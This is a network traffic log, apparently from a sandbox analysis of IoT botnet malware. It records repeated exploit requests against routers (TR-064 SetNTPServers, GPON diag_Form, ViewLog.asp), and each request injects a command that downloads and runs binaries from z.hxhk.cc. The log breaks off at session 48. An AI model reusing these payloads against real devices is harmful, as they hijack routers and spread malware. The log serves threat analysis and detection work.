Mar 18, 2024 09:57:01.559572935 CET	160	IN	HTTP/1.1 400 Bad Request Connection: close Content-Length: 11 content-type: text/plain; charset=utf-8 x-served-by: cache-muc13920 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.23	47874	99.247.16.221	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.479418993 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.23	52000	99.247.255.214	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.483119965 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.23	49878	62.90.227.131	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.521275997 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:00.744044065 CET	347	IN	HTTP/1.1 400 Bad Request Server: rhino-core-shield Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 72 68 69 6e 6f 2d 63 6f 72 65 2d 73 68 69 65 6c 64 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>rhino-core-shield</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.23	33618	172.90.168.5	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.535659075 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.23	58274	179.235.85.170	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.587332010 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:03.722134113 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.23	47554	122.117.127.10	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.596880913 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:02.090281010 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.23	48036	99.247.16.221	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.596935987 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:01.194412947 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.23	49476	213.136.89.216	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.598609924 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.578475952 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:02.730192900 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:02.924608946 CET	323	IN	HTTP/1.1 404 Not Found Server: nginx/1.22.1 Date: Mon, 18 Mar 2024 08:57:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 46 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 97 8d 7f bd 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFFzJaC0
Mar 18, 2024 09:57:02.924671888 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Mon, 18 Mar 2024 08:57:02 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.23	46126	83.6.182.204	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.598664045 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.642338037 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:01.841758013 CET	336	IN	HTTP/1.1 405 Not Allowed Server: nginx Date: Mon, 18 Mar 2024 08:57:02 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Mar 18, 2024 09:57:01.841820002 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:02 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.23	52086	99.247.255.214	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.610841036 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.23	51540	4.194.103.75	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.621166945 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:00.948512077 CET	525	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:57:00 GMT Connection: close Content-Length: 334 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.23	33070	128.199.249.92	80

Timestamp	Bytes transferred	Direction	Data
